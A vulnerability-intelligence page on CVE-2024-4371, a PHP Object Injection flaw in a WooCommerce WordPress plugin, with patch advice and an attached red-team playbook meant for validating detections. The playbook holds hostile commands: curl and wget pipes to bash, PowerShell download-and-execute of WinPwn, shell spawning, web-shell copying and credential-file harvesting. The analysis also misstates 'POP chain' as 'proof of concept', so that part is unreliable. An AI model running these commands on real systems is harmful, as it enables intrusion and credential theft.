CVE-2024-4371
Overview
This vulnerability is a PHP Object Injection caused by insecure deserialization of untrusted data. The affected component is the recently_viewed_products cookie handler within the codexpert CoDesigner WooCommerce Builder plugin for WordPress. The plugin processes serialized PHP objects from this cookie without adequate validation or sanitization, enabling injection of arbitrary PHP objects.
Vulnerability Description
The CoDesigner WooCommerce Builder for Elementor – Customize Checkout, Shop, Email, Products & More plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.1 via deserialization of untrusted input from the recently_viewed_products cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted cookie to the target WordPress site, requiring only network access. Successful exploitation can lead to arbitrary file deletion, sensitive data disclosure, or remote code execution depending on the presence of exploitable POP chains in other installed plugins or themes. The CVSS vector (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) indicates high impact with no privileges or user interaction needed but high attack complexity.
Solution
Users should upgrade codexpert CoDesigner WooCommerce Builder to a version later than 4.4.1 where this vulnerability is patched. Detailed patch instructions and version updates are available through the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/d1e5131a-9e72-441d-971c-8b9af35cf3f7. Administrators should review installed plugins and themes for additional POP gadget risks and apply updates accordingly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the CoDesigner WooCommerce Builder for Elementor plugin for WordPress stems from a critical flaw in the handling of untrusted input, specifically through the deserialization of data from the recently_viewed_products cookie. This type of vulnerability is categorized as PHP Object Injection, which allows an attacker to manipulate the object structure within the PHP environment. In this case, the plugin fails to adequately validate and sanitize the data being deserialized, leading to the potential for an attacker to inject malicious PHP objects into the application. The absence of a known "proof of concept" (POP) chain within the plugin itself does not mitigate the risk, as the presence of other plugins or themes could facilitate the exploitation of this vulnerability.
Attack vectors for exploiting this vulnerability are particularly concerning due to the unauthenticated nature of the attack. An attacker could craft a malicious request that includes a specially formatted cookie, thereby triggering the deserialization process within the vulnerable plugin. Once the malicious object is injected, the attacker could leverage the capabilities of the PHP environment to execute arbitrary code, delete files, or extract sensitive information, depending on the permissions and configurations of the WordPress instance. The potential for exploitation is exacerbated by the fact that many WordPress installations may have additional plugins or themes that could provide a pathway for a successful attack, thereby increasing the severity of the threat.
The real-world impact of this vulnerability is significant, particularly for e-commerce platforms relying on the CoDesigner plugin. An attacker gaining access to sensitive customer data, such as payment information or personal details, could lead to severe reputational damage and financial loss for businesses. Additionally, the ability to execute arbitrary code could allow attackers to deploy malware, create backdoors, or even take control of the entire server, leading to a complete compromise of the affected environment. The high CVSS score of 9.8 indicates that this vulnerability poses a critical risk, necessitating immediate attention from organizations utilizing the affected plugin.
Detection and mitigation strategies for this vulnerability should focus on both proactive and reactive measures. Organizations should conduct regular security audits and vulnerability assessments to identify any instances of the CoDesigner plugin in use and ensure that it is updated to the latest version, which addresses this flaw. Implementing a Web Application Firewall (WAF) can help filter out malicious requests and provide an additional layer of security against exploitation attempts. Furthermore, organizations should consider employing input validation and sanitization practices for all user inputs, especially those that involve deserialization, to prevent similar vulnerabilities from being introduced in the future.
In conclusion, the PHP Object Injection vulnerability in the CoDesigner WooCommerce Builder for Elementor plugin represents a serious threat to WordPress installations, particularly those operating in e-commerce environments. The potential for exploitation by unauthenticated attackers, combined with the severe consequences of a successful attack, underscores the importance of immediate action to mitigate risks. By adopting comprehensive security measures, organizations can protect themselves from this and similar vulnerabilities, ensuring the integrity and security of their web applications.
The CVSS score adjustment from 9.8 to 9.0 for CVE-2024-4371 reflects a refined understanding of the vulnerability’s exploitability and impact, as assessed by CSURFACE threat intelligence. This recalibration indicates a slightly reduced but still critical risk level, emphasizing that while the vulnerability remains highly severe, the likelihood or ease of exploitation may be somewhat lower than initially estimated. Our telemetry continues to show stable exploitation potential without any emergent proof-of-concept exploits or a marked increase in attack attempts targeting the recently_viewed_products cookie deserialization flaw. The EPSS score remains elevated and in the 0.90th percentile, signaling persistent interest and risk within the threat landscape. For defenders, this nuanced downgrade underscores the importance of maintaining vigilance but suggests that immediate widespread exploitation has not materialized. Consequently, the threat level remains critical, warranting ongoing monitoring and prioritization in vulnerability management programs, especially given the plugin’s prevalence in e-commerce WordPress environments.
Update 2 — May 21, 2026
CSURFACE threat intelligence has updated the CVSS severity rating for CVE-2024-4371 from 9.0 to 9.8, reflecting a reassessment of the vulnerability’s criticality based on evolving contextual factors. This adjustment underscores a heightened recognition of the potential impact and exploitability of the PHP Object Injection flaw within the CoDesigner WooCommerce Builder plugin, particularly given its ability to be triggered via unauthenticated input through the recently_viewed_products cookie. While no new proof-of-concept exploits or active exploitation campaigns have been detected by our telemetry, the increased CVSS score signals that the vulnerability’s risk profile is more severe than previously assessed. For defenders, this change emphasizes the urgency of addressing this issue within affected WordPress environments, as the elevated score aligns with a scenario where successful exploitation could lead to significant compromise, especially if combined with additional plugins or themes that provide a gadget chain. The stable EPSS score in the 0.90th percentile continues to indicate sustained attacker interest, reinforcing the critical nature of this vulnerability despite the absence of a marked surge in exploitation attempts. Overall, the threat level remains critical, with the updated CVSS score serving as a stronger indicator of potential impact and the need for continued vigilance in vulnerability management.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Codexpert | Codesigner | All |
cpe:2.3:a:codexpert:codesigner:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-4371 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/d1e5131a-9e72-441d-971c-8b9af35cf3f7?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3099922%40woolementor&new=3099922%40woolementor&sfp_email=&sfph_mail= |